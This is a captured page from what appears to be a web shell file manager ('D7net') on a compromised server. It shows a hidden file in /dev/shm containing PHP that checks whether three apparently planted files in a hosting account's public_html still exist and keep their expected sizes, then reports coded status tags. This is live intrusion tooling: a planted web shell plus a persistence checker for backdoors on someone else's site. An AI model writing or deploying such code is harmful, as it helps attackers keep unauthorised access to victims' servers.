D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.resource
back
Copy
<?php $r = '/home/jenmbrbv/public_html'; $x = ["/fine.php"=>"bd@@229977526@@960", "/style.php"=>"bd@@229977530@@827", "/port.php"=>"bd@@242366995@@621"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');